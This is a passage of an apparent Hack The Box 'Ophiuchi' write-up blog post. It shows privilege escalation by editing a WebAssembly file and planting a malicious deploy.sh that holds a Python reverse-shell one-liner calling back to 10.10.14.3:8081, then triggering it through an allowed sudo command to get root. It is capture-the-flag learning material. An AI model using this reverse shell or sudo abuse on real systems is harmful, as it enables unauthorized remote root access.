└─$ git clone https://github.com/WebAssembly/wabt.git            
Cloning into &#39;wabt&#39;...
remote: Enumerating objects: 29666, done.
remote: Counting objects: 100% (93/93), done.
remote: Compressing objects: 100% (72/72), done.
remote: Total 29666 (delta 37), reused 35 (delta 21), pack-reused 29573
Receiving objects: 100% (29666/29666), 20.83 MiB | 269.00 KiB/s, done.
Resolving deltas: 100% (23736/23736), done.
</code></pre><p>Since we&rsquo;ve got the credentials to the <code>admin</code> user, it&rsquo;s convenient enough to just <code>scp</code>  <code>main.wasm</code> to our local machine to decompile. Once we&rsquo;ve done so <code>~/Tools/wabt/bin/wasm2wat ~/main.wasm &gt; ~/main.wat</code> yeilds the following web assembly code.</p>
<pre tabindex="0"><code class="language-WebAssembly" data-lang="WebAssembly">(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32)
    i32.const 0)
  (table (;0;) 1 1 funcref)
  (memory (;0;) 16)
  (global (;0;) (mut i32) (i32.const 1048576))
  (global (;1;) i32 (i32.const 1048576))
  (global (;2;) i32 (i32.const 1048576))
  (export &#34;memory&#34; (memory 0))
  (export &#34;info&#34; (func $info))
  (export &#34;__data_end&#34; (global 1))
  (export &#34;__heap_base&#34; (global 2)))
</code></pre><p>After more trial and error than I&rsquo;d care to admit, it is determined that all we&rsquo;ve got to do is change <code>i32.const</code> to be <code>1</code>, and the file becomes.</p>
<pre tabindex="0"><code class="language-WebAssembly" data-lang="WebAssembly">(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32)
    i32.const 1)
  (table (;0;) 1 1 funcref)
  (memory (;0;) 16)
  (global (;0;) (mut i32) (i32.const 1048576))
  (global (;1;) i32 (i32.const 1048576))
  (global (;2;) i32 (i32.const 1048576))
  (export &#34;memory&#34; (memory 0))
  (export &#34;info&#34; (func $info))
  (export &#34;__data_end&#34; (global 1))
  (export &#34;__heap_base&#34; (global 2)))
</code></pre><p>We finish up by rebuilding <code>main.wasm</code> via <code>~/Tools/wabt/bin/wat2wasm ~/main.wat &gt; ~/main.wasm</code>, and use <code>scp</code> once more to get it back on the machine.<br>
<img src="/posts/images/hack-the-box-ophiuchi-writeup/recompile.png" alt="recompile"><br>
<strong>Figure 11:</strong> After modifying <code>i32.const</code> to be equal <code>1</code>, we place <code>main.wasm</code> back onto the victim machine.</p>
<p>Next, we ssh back into the box as <code>admin</code>. We&rsquo;ll navigate to the <code>/tmp</code> directory and create our own <code>deploy.sh</code> to call our reverse shell. Since we know port <code>8081</code> worked last time, we&rsquo;ll use that again (make sure the old listener used to catch the foothold is reset). The reverse shell payload will be the following python payload.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>python3 <span style="color:#f92672">-</span>c <span style="color:#e6db74">&#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#34;10.10.14.3&#34;,8081));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&#34;/bin/bash&#34;,&#34;-i&#34;]);</span>
</span></span></code></pre></div><p><img src="/posts/images/hack-the-box-ophiuchi-writeup/deploy_sh.png" alt="deploy_sh"><br>
<strong>Figure 12:</strong> SSH back in and create a malicious <code>deploy.sh</code> to call a reverse shell.</p>
<p>To gain root privileges we&rsquo;ll do what we know we&rsquo;re allowed to do which is <code>sudo /usr/bin/go run /opt/wasm-functions/index.go</code>, and as you can see below netcat has caught the root reverse shell.<br>
<img src="/posts/images/hack-the-box-ophiuchi-writeup/rooted.png" alt="rooted"><br>
<strong>Figure 13:</strong> Root achieved via <code>/tmp</code> directory containing our own <code>deploy.sh</code> and <code>main.wasm</code> files.</p>
<h1 id="conclusion">Conclusion</h1>
<p>Knowing very little about Golang, and even less about WebAssembly, made the privilege escalation to root a real bastard for me. It was a great learning experience to decompile and recompile WebAssembly code. The box overall was extremely enjoyable (but I still am not sure how to pronounce the name).</p>
<h1 id="references">References</h1>
<ol>
<li><a href="https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858" target="_blank">https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858</a></li>
<li><a href="https://github.com/artsploit/yaml-payload" target="_blank">https://github.com/artsploit/yaml-payload</a></li>
<li><a href="https://github.com/artsploit/yaml-payload/issues/3" target="_blank">https://github.com/artsploit/yaml-payload/issues/3</a></li>
<li><a href="https://github.com/WebAssembly/wabt" target="_blank">https://github.com/WebAssembly/wabt</a></li>
</ol>

  
  <hr>
<div class="footer">
    
	    
            <a class="previous-post" href="/posts/luks-encrypted-arch-linux-on-pinebook-pro-again/?ref=footer"><span style="font-weight:bold;">« Previous</span><br>Installing Arch Linux on the Pinebook Pro with...</a>
        
	    
            <div class="next-post">
                <a href="/posts/hack-the-box-armageddon-writeup/?ref=footer"><span style="font-weight:bold;">Next »</span><br>Hack the Box Armageddon Writeup</a>
            </div>
        
    
</div>

  
</div>
            </main>
            
  

        </div>
    </body>
</html>
